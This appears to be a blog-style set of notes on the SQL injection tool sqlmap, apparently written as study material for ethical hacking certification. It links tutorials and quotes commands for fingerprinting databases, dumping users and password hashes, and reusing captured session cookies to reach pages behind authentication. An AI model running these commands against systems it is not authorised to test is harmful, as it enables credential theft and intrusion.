Using sqlmap
This wicked tool comes with Kali and is easy to install on other Linuxes. All you need is a web form on a website as an entry point for SQL injection.
See this short “cookbook” first for quick examples of usage:
From https://securityonline.info/top-25-useful-sqlmap-commands/
Here’s the lengthy GitHub usage page:
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Using Captured Headers to Get Past Authentication
You can attack injection points manually, or if you need to inject into a form that’s behind authentication, you can capture a header using Burp, save it as a file, and let sqlmap use the parameters (like session tokens and cookies) right from that file.
You can also use the CO2 extension in Burp to pass authentication tokens:
https://security.stackexchange.com/questions/66688/login-required-before-sqlmap
sqlmap POST request injection
From https://hackertarget.com/sqlmap-post-request-injection/ :
# Parse request data and test | request data can be obtained with burp
./sqlmap.py -r <request-file> <options>
#Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint
# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname
# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba
# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords
From https://github.com/sqlmapproject/sqlmap/wiki/Usage :
# Supply POST data with the –data option
python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
# Manipulate cookies:
Options and switch: --cookie
, --cookie-del
, --load-cookies
and --drop-set-cookie
https://github.com/sqlmapproject/sqlmap/wiki/Usage#http-cookie-header
And here’s a good, straightforward medium-length tutorial with examples of the major operations, like database discovery, table and column enumeration, data dumps etc.:
Or try this shorter tutorial:
https://www.sqlinjection.net/sqlmap/tutorial/
Introducing JackkTutorials. This is a great YouTube channel on lots of hacking subjects, and this 15-minute video walks you through the basics:
https://www.youtube.com/watch?v=yPMbb38pwVI&t=446s
Getting Past Authentication
Finally, here’s some discussion of using sqlmap to access (from the command line or Burp or similar) pages/forms that lie behind authentication, meaning you’ll need to pass session tokens and params with your attacks:
https://medium.com/@jonaldallan/passed-ec-councils-certified-ethical-hacker-practical-20634b6f0f2
Basically, the job is to capture a request header and use it in Burp or with
sqlmap -r headerfile.txt ...